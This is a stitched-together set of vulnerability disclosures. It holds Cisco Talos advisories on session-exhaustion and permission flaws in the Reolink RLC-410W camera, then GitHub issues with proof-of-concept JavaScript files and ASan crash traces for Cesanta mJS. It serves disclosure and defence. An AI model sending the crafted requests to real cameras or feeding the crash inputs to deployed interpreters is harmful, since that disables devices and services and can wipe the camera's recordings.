A denial of service vulnerability exists in the cgiserver.cgi session creation functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to prevent users from logging in. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

A denial of service vulnerability exists in the cgiserver.cgi session creation functionality of reolink RLC-410W v3.0.0.136\_20121102. A specially-crafted HTTP request can lead to prevent users from logging in. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

Reolink RLC-410W v3.0.0.136\_20121102

**Product URLs**

RLC-410W - https://reolink.com/us/product/rlc-410w/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-400 - Uncontrolled Resource Consumption

**Details**

The Reolink RLC-410W is a WiFi security camera. The camera includes motion detection functionalities and various methods to save the recordings.

The RLC-410W maintains an in-memory session list. The `cgiserver.cgi` will keep the session list updated, removing the out of date sessions and the invalid ones.

A specially-crafted HTTP request can pollute the sessions list with a non-removable session, possibly filling the session list up and preventing the users from logging into the camera.

The `cgiserver.cgi` uses the `parse_incoming_and_check_command` function to parse the URL and body data. For many APIs their data can be specified either through the URL or trough the request body. For the `Login` API the body request looks like the following:

    [
        {
            "cmd":    "Login",
            "action": "0",
            "param":{
              "User":{
                  "userName":<username>,
                  "password":<password>
              }
            }
        }
    ]
    

Since it is possible to provide a list of commands, the body request is composed of a JSON array of JSON objects. Each object represents a command with its parameters.

The function `parse_incoming_and_check_command`:

    int parse_incoming_and_check_command(cgi_request *req)
    
    {
        [...]
        
        Json::Reader::Reader(json_reader);
        Json::Value::Value(&json_value,0);
        iVar1 = parse_request(req);
        if (iVar1 == 0) {
            if (((int)req->CONTENT_LENGTH < 1) || (req->is_commands_in_body == 0)) {
                            /* no body is present */
            [...]
            }
            std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string
                    ((char *)post_data_as_basic_string,(allocator *)req->body_data);
            pbVar4 = post_data_as_basic_string;
            post_data_is_valid_json =
                Json::Reader::parse(json_reader,post_data_as_basic_string,&json_value,true);
            std::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string
                    ((basic_string<char,std::char_traits<char>,std::allocator<char>> *)
                    post_data_as_basic_string);
            if (post_data_is_valid_json == 0) {
            AVar3 = param error;
            }
            else {
            post_data_is_valid_json = Json::Value::isArray(&json_value,pbVar4);
            json_idx = 0;
            if (post_data_is_valid_json != 0) {
                for (; total_number_of_elements = Json::Value::size(&json_value),
                    json_idx < total_number_of_elements; json_idx = json_idx + 1) {
                [... parse a JSON command object and insert it into the command list ...]                   [1]
                }
                goto LAB_0043ccbc;
            }
            AVar3 = protocol;
            }
            req->req_status = AVar3;
        }
        iVar1 = -1;
        LAB_0043ccbc:
        Json::Value::~Value(&json_value);
        Json::Reader::~Reader(json_reader);
        return iVar1;
    }
    

At `[1]` a single command is parsed and inserted into a list of commands that will later be iterated on, and each command will be executed. Later on, in the case of the `Login` API, a session is created. If the `Login` data are not provided in the URI, the `associate_session_to_request` will be executed to create the session:

    undefined4 associate_session_to_request(c_cgiserver_obj *cgi,cgi_request *req)
    
    {
        dword dVar1;
        API_status_code AVar2;
        cgi_session *session_;
        int iVar3;
        cgi_session *session;
        session_node *session_node_cur;
        dword apStack56 [4];
        
        session_node_cur = (cgi->session_node).session_node_start;
        while( true ) {
            if (session_node_cur == (session_node *)&(cgi->session_node).session_node_end) {
            AVar2 = please login first;
            if (req->req_command_ID == Login) {
                if (cgi->number_of_active_sessions < cgi->max_number_of_sessions) {
                session_ = (cgi_session *)operator.new(0xe8);
                c_cgisession::c_cgisession(session_,cgi,cgi->next_session_ID);
                req->session_ID = session_->session_ID;
                iVar3 = c_cgisession::init(session_,req);
                if (-1 < iVar3) {
                    cgi->next_session_ID = cgi->next_session_ID + 1;
                    apStack56[2] = session_->session_ID;
                    apStack56[3] = (dword)session_;
                    std::
                    _Rb_tree<unsigned_int,std::pair<unsigned_int_const,c_cgisession*>,std::_Select1st<std::pair<unsigned_int_const,c_cgisession*>>,std::less<unsigned_int>,std::allocator<std::pair<unsigned_int_const,c_cgisession*>>>
                    ::_M_insert_unique((pair *)apStack56,&cgi->session_node,(dword)(apStack56 + 2));
                    c_cgisession::cgi_req_proc(session_,req);                                               [2]
                    return 0;
                }
                session_->session_status = INVALID;
                AVar2 = login failed;
                }
                else {
                AVar2 = max session;
                }
            }
            req->req_status = AVar2;
            return 0xffffffff;
            }
            [...]
        }
        req->session_ID = session->session_ID;
        dVar1 = time((time_t *)0x0);
        session->last_time_checked = dVar1;
        session->lease_time = dVar1 + 0xe10;
        c_cgisession::cgi_req_proc(session,req);
        return 0;
    }
    

At `[2]` is called the function that will iterate over the commands provided and execute them. Based on the `Login` API results, the `session_status` field of the sessions will be set, either to `VALID` or `INVALID`.

An unhandled logic case exists in the `Login` API execution flow. Indeed, if the provided URI `cmd` is `Login`, but then an empty array is provided as body, a session is created nevertheless. Because the list of commands is empty, the `Login` request will not be performed.

Since the session initialization does not set the `session_status` and assumes it will be set later on elaborating the provided command, the session will have an unknown state.

Following the `manage_existing_sessions` function, responsible for keeping the session list updated:

    void manage_existing_sessions(c_cgiserver_obj *cgi)
    
    {
        [...]
        
        current_time = time((time_t *)0x0);
        session_node_ptr = (cgi->session_node).session_node_start;
        while (psVar3 = (session_node *)&(cgi->session_node).session_node_end, session_node_ptr != psVar3)
        {
            session_data = session_node_ptr->session_data_ptr;
            session_status = session_data->session_status;
            if (session_status == VALID) { [3]
                [... Handle a VALID session ...]
            }
            if (session_status == INVALID) { [4]
                [... Handle an INVALID session ...]
            }
            else {
            get_next_node(&old_session_node,&session_node_ptr);
            }
        }
        [...]
    }
    

The `manage_existing_sessions` function does only handle the `VALID` and `INVALID` states respectively at `[3]` and `[4]`. That means that the invalid created session will never be removed. This can fill up the session list, effectively blocking the login to the device.

**Timeline**

2021-12-06 - Vendor Disclosure  
2022-01-19 - Vendor Patched  
2022-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2021-40406: TALOS-2021-1423 || Cisco Talos Intelligence Group

An incorrect default permission vulnerability exists in the cgiserver.cgi cgi_check_ability functionality of reolink RLC-410W v3.0.0.136_20121102. The SetMdAlarm API sets the movement detection parameters, giving the ability to set the sensitivity of the camera per a range of hours, and which of the camera spaces to ignore when considering movement detection. Because in cgi_check_ability the SetMdAlarm API does not have a specific case, the user permission will default to 7. This will give non-administrative users the possibility to change the movement detection parameters.

**Summary**

Multiple incorrect default permissions vulnerabilities exist in the cgiserver.cgi cgi\_check\_ability functionality of reolink RLC-410W v3.0.0.136\_20121102. A specially-crafted HTTP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

Reolink RLC-410W v3.0.0.136\_20121102

**Product URLs**

RLC-410W - https://reolink.com/us/product/rlc-410w/

**CVSSv3 Score**

7.1 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

**CWE**

CWE-284 - Improper Access Control

**Details**

The Reolink RLC-410W is a WiFi security camera. The camera includes motion detection functionalities and various methods to save the recordings.

The RLC-410W offers several APIs. Each one requires a specific user permission to be executed. An error in the permission check exists that would allow unprivileged users to execute privileged APIs.

The permission is specified using a numeric value, allegedly. Only three bits are used:

    G S A
    2 1 0
    

The bit 2 (value 4) is, allegedly, used to permit the majority of `Get` APIs. The bit 1 (value 2) is, allegedly, used to permit the majority of `Set` APIs. The bit 0 (value 1) is, allegedly, used to permit the most critical APIs, including some `Get` and `Set`. For example, APIs that required the bit 0 set are: `UpgradePrepare`, `Upgrade`, `Reboot`, `Shutdown` and others.

The permission is tangled with the user session. Indeed a table exists in the context of the user session that shows each API category with the corresponding user permission.

If the API request is performed by a logged-in user, the permission is checked by the `cgi_check_ability` function:

    undefined4 cgi_check_ability(API_command API_command,cgi_session *session,int channel)
    
      {
        [...]
    
        ability_struct = session->ability_struct;
        if (API_command == Login) {
          return 0;
        }
        command_struct = cgi_find_cmd_table(API_command);
        if (command_struct == (command_struct *)0x0) {
          return not support;
        }
        if (false) {
      switchD_0043a174_caseD_b:
          session_ability_ = 7;                                                                             [1]
          goto LAB_0043a314;
        }
        switch(API_command) {
        case GetDevInfo:
          session_ability_ = ability_struct->GetDevInfo;
          break;
        [... other API cases ...]
        default:
          goto switchD_0043a174_caseD_b;                                                                    [2]
        [... other API cases ...]
          break;
        case GetCloud:
        case SetCloud:
        case GetCloudSchedule:
        case SetCloudSchedule:
          session_ability_ = ability_struct->Cloud;
          break;
        case GetPowerLed:
        case SetPowerLed:
          session_ability_ = ability_struct->PowerLed;
        }
      LAB_0043a314:
        uVar2 = ability error;
        if ((session_ability_ & command_struct->ability_cmd) != 0) {                                        [3]
          uVar2 = 0;
        }
        return uVar2;
      }
    

The `cgi_check_ability` checks, given the requested `API_command`, if the user permission satisfies the API permission. If so the API is executed. If the API requested is not within the switch cases, then the default case, at `[2]`, is performed. The check of the permission is performed at `[3]` using a logical `AND` operator between the user permission and the required command permission. It means that, if the permission guaranteed to the user is `7`, like for the default case at `[2]`, all the APIs with a permission value are allowed.

The following APIs do not have a specific case within the switch:

    {'Login', 'HeartBeat', 'GetMdState', 'GetHddInfo', 'Unknown', 'Playback', 'UpgradePrepare', 'Format', 'SetMdAlarm', 'GetWifiSignal', 'GetAbility', 'GetMdAlarm', 'Logout'}
    

An authenticated user would already be able to access the above `Get` APIs, but APIs like `UpgradePrepare`, `Format` and `SetMdAlarm` should not be executable by a non-admin user. Their impact is described below in dedicated sections.

Note that, while this issue requires a logged-in user, it’s possible to use TALOS-2021-1420 to perform these API calls without authentication. In this case, the actual chained CVSS score would be 8.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H and would include the `Get` APIs, since an authenticated user is not necessary.

**CVE-2021-40413 - UpgradePrepare**

The `UpgradePrepare` is the API that checks if a provided filename identifies a new version of the RLC-410W firmware. If the version is new, it would be possible, allegedly, to later on perform the `Upgrade`. Here is the relevant part of the `UpgradePrepare` API code:

    undefined4 UpgradePrepare(cgi_session *session,cgi_cmd *cgi_cmd)
    
    {
      [...]
              current_time = cgi_tick_sec_get();
              cgi_obj->time_of_UpgradePrepare = current_time;                                               [4]
              cgi_cmd->API_processing_status = 3;
              return 0;
    
      [...]
    }
    

Eventually, in the `UpgradePrepare` function, at `[4]` the `time_of_UpgradePrepare` field will be set and later on checked in `cgi_proc`.

The relevant part of the `cgi_proc` function:

    undefined4 cgi_proc(c_cgiserver_obj *cgi)
    
    {
      [...]
          current_time = cgi_tick_sec_get();
          if (300 < current_time - cgi->time_of_UpgradePrepare) {                                           [5]
            if (cgi->time_of_UpgradePrepare == 0) {
              return 0;
            }
            cgi_log(1,0,"[%s,%d]",
                    "/home/lgb/ipc_v1_ver/20201211/ipc_20200324_V1/product/cgiserver/src/cgi_server.cpp"
                    ,0x1e5);
            cgi_log(0,0,"upgrade out of time!!!!!");
            cgi->reboot_proc_status = 1;
            cgi->is_upgrade_started = 0;
          }
          uVar1 = 0;
        }
      [...]
    }
    

At `[5]` it is shown that, if the `Upgrade` is not executed within 5 minutes of the completion of `UpgradePrepare`, the device will reboot. In `cgi_check_ability` the `UpgradePrepare` API does not have a specific case, the user permission will default to 7. This will give non-administrative users the possibility to reboot the device. Furthermore many other services are going to shut down just after the `UpgradePrepare` request is performed, making the recording and other services unavailable.

**CVE-2021-40414 - SetMdAlarm**

The `SetMdAlarm` API sets the movement detection parameters, giving the ability to set the sensitivity of the camera per a range of hours, and which of the camera spaces to ignore when considering movement detection. In `cgi_check_ability` the `SetMdAlarm` API does not have a specific case, the user permission will default to 7. This will give non-administrative users the possibility to change the movement detection parameters.

**CVE-2021-40415 - Format**

The `Format` API formats the SD card, deleting all the recordings in it. After the SD card is formatted, the device will reboot. Because in `cgi_check_ability` the `Format` API does not have a specific case, the user permission will default to 7. This will give non-administrative users the possibility to format the SD card and reboot the device.

**CVE-2021-40416 - Get APIs**

All the `Get` APIs that are not included in `cgi_check_ability` are already executable by any logged-in users. In TALOS-2021-1420, the`Get` APIs are not included and that is an issue. This will allow `Get` APIs without authentication.

**Timeline**

2021-12-06 - Vendor Disclosure  
2022-01-19 - Vendor Patched  
2022-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2021-40414: TALOS-2021-1425 || Cisco Talos Intelligence Group

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /lib/x86_64-linux-gnu/libc.so.6+0x45a1f. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    function JSEtest() {
        let arr = [1];
        [[arr.push(0, 17)].push([arr.push(0, 17)].push(0, 17))];
    }
    JSEtest();

​

**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==126169==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fb20926da20 bp 0x000000000000 sp 0x7ffc6083ff90 T0)
==126169==The signal is caused by a READ memory access.
==126169==Hint: address points to the zero page.
    #0 0x7fb20926da1f  (/lib/x86\_64-linux-gnu/libc.so.6+0x45a1f)
    #1 0x5619439c70b3 in cstr\_to\_ulong src/mjs\_string.c:232
    #2 0x5619439c70b3 in str\_to\_ulong src/mjs\_string.c:242
    #3 0x5619438ff7bb in mjs\_array\_length src/mjs\_array.c:83
    #4 0x5619438ff7bb in mjs\_array\_push src/mjs\_array.c:115
    #5 0x5619438ff7bb in mjs\_array\_push\_internal src/mjs\_array.c:131
    #6 0x561943924244 in mjs\_execute src/mjs\_exec.c:853
    #7 0x56194392da05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #8 0x56194392da05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #9 0x5619438ea909 in main src/mjs\_main.c:47
    #10 0x7fb209249b96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #11 0x5619438eb449 in \_start (/usr/local/bin/Gmjs+0xe449)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86\_64-linux-gnu/libc.so.6+0x45a1f)
==126169==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46539: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x45a1f) · Issue #217 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x2c6ae. This vulnerability can lead to a Denial of Service (DoS).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-46541: SEGV (/usr/local/bin/mjs+0x2c6ae) · Issue #222 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_get_mjs at src/mjs_builtin.c. This vulnerability can lead to a Denial of Service (DoS).

CVE-2021-46540: SEGV src/mjs_builtin.c:105 in mjs_get_mjs  · Issue #214 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /lib/x86_64-linux-gnu/libc.so.6+0x18e810. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    load('[\u\r \ntrue\t\r \n,\t\r \nnull\t\r \n,123.456\t\r \n]' +
        '[\t\r \ntrue\t\r \n,\t\r \nnull\t\r \n,123.456\t\r \n]' +
        '\t\r \n}\t\r \n'); 
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==28077==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f9ece3d7811 bp 0x7ffc033dfbb0 sp 0x7ffc033df328 T0)
==28077==The signal is caused by a READ memory access.
==28077==Hint: address points to the zero page.
    #0 0x7f9ece3d7810  (/lib/x86\_64-linux-gnu/libc.so.6+0x18e810)
    #1 0x7f9ece88ee55  (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x50e55)
    #2 0x557908c817a0 in cs\_read\_file src/common/cs\_file.c:34
    #3 0x557908bb6043 in mjs\_exec\_file src/mjs\_exec.c:1087
    #4 0x557908b93bf6 in mjs\_load src/mjs\_builtin.c:69
    #5 0x557908bad244 in mjs\_execute src/mjs\_exec.c:853
    #6 0x557908bb6a05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #7 0x557908bb6a05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #8 0x557908b73909 in main src/mjs\_main.c:47
    #9 0x7f9ece26ab96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #10 0x557908b74449 in \_start (/usr/local/bin/mjs+0xe449)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86\_64-linux-gnu/libc.so.6+0x18e810)
==28077==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46543: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x18e810) · Issue #219 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_print at src/mjs_builtin.c. This vulnerability can lead to a Denial of Service (DoS).

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**

function D(i) {
    print++i
    return \[i\];
}
function A() {
    return D.apply(print(chr(D.apply(print(chr(0)), \[i, 1, 2, 3\]))), \[i, 1, 2, 3\]);
}
function JSEtest(i) {
    return A(i, 1, 2, 3);
}
JSEtest(89)\[0\]
JSEtest(0.2)

​

**Execution steps & Output**

$ ./mjs/build/mjs poc.js
\\x00
null
ASAN:DEADLYSIGNAL
=================================================================
==55629==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55789394d7f2 bp 0x000000000095 sp 0x7ffdc33bd878 T0)
==55629==The signal is caused by a READ memory access.
==55629==Hint: address points to the zero page.
    #0 0x55789394d7f1 in mjs\_print src/mjs\_builtin.c:18
    #1 0x557893968244 in mjs\_execute src/mjs\_exec.c:853
    #2 0x557893971a05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #3 0x557893971a05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #4 0x55789392e909 in main src/mjs\_main.c:47
    #5 0x7f7c0e673b96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #6 0x55789392f449 in \_start (/usr/local/bin/mjs+0xe449)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_builtin.c:18 in mjs\_print
==55629==ABORTING

Credits: Found by OWL337 team.

CVE-2021-46542: SEGV src/mjs_builtin.c:18 in mjs_print · Issue #215 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19. This vulnerability can lead to a Denial of Service (DoS).

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    let a = [];
    for (let k = 0; k < 5; ++k) {
      a[gc(gc(JSON.stringify(gc('#1.1: -0 - -0 === 0. Actual: '))))](0, a[k]());
    }
**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==30781==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f716475ce1a bp 0x7ffee0cc88e0 sp 0x7ffee0cc8040 T0)
==30781==The signal is caused by a READ memory access.
==30781==Hint: address points to the zero page.
    #0 0x7f716475ce19  (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x59e19)
    #1 0x55af535c987a in getprop\_builtin\_array src/mjs\_exec.c:476
    #2 0x55af535c987a in getprop\_builtin src/mjs\_exec.c:536
    #3 0x55af535c987a in mjs\_execute src/mjs\_exec.c:690
    #4 0x55af535d2a05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #5 0x55af535d2a05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #6 0x55af5358f909 in main src/mjs\_main.c:47
    #7 0x7f716412fb96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #8 0x55af53590449 in \_start (/usr/local/bin/mjs+0xe449)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x59e19)
==30781==ABORTING

Credits: Found by OWL337 team.

CVE-2021-46544: SEGV (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19) · Issue #220 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_json_stringify at src/mjs_json.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((JSON.parse-6.54*21e2)(JSON.stringify([1, 2, 3])));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==61059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x56205ea42cf1 bp 0x00000000007c sp 0x7ffdf0132cb8 T0)
==61059==The signal is caused by a READ memory access.
==61059==Hint: address points to the zero page.
    #0 0x56205ea42cf0 in mjs\_json\_stringify src/mjs\_json.c:273
    #1 0x56205ea42cf0 in mjs\_json\_stringify src/mjs\_json.c:272
    #2 0x56205ea42cf0 in mjs\_json\_stringify src/mjs\_json.c:272
    #3 0x56205ea42cf0 in mjs\_op\_json\_stringify src/mjs\_json.c:494
    #4 0x56205ead6955 in cs\_varint\_decode src/common/cs\_varint.c:65
    #5 0x56205eaa1a05 in mjs\_strcmp src/mjs\_string.c:228
    #6 0x60b000000082  (<unknown module>)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_json.c:273 in mjs\_json\_stringify

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46554: SEGV src/mjs_json.c:273 in mjs_json_stringify · Issue #229 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via add_lineno_map_item at src/mjs_bcode.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))(((print-6.32*(823))-6.32*21e2)(JSON.parse(JSON.stringify([(0)]))));J
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==82386==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000e4 (pc 0x55a4aeab6fd4 bp 0x00000000008c sp 0x7ffc17a28520 T0)
==82386==The signal is caused by a READ memory access.
==82386==Hint: address points to the zero page.
    #0 0x55a4aeab6fd3 in add\_lineno\_map\_item src/mjs\_bcode.c:15
    #1 0x55a4aeab6fd3 in emit\_int src/mjs\_bcode.c:47
    #2 0x55a4aeb600dd in parse\_comparison src/mjs\_parser.c:431
    #3 0x55a4aeb600dd in parse\_equality src/mjs\_parser.c:435
    #4 0x55a4aeb65d0b in parse\_bitwise\_and src/mjs\_parser.c:440
    #5 0x55a4aeb65d0b in parse\_bitwise\_xor src/mjs\_parser.c:445
    #6 0x55a4aeb32177 in parse\_bitwise\_or src/mjs\_parser.c:450
    #7 0x55a4aeb32177 in parse\_logical\_and src/mjs\_parser.c:455
    #8 0x55a4aeb32177 in parse\_logical\_or src/mjs\_parser.c:460
    #9 0x55a4aeb32177 in parse\_ternary src/mjs\_parser.c:465
    #10 0x55a4aeb32177 in parse\_assignment src/mjs\_parser.c:503
    #11 0x55a4aeb388d7 in parse\_expr src/mjs\_parser.c:507
    #12 0x55a4aeb388d7 in parse\_statement src/mjs\_parser.c:945

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_bcode.c:15 in add\_lineno\_map\_item
==82386==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

Tag

#dos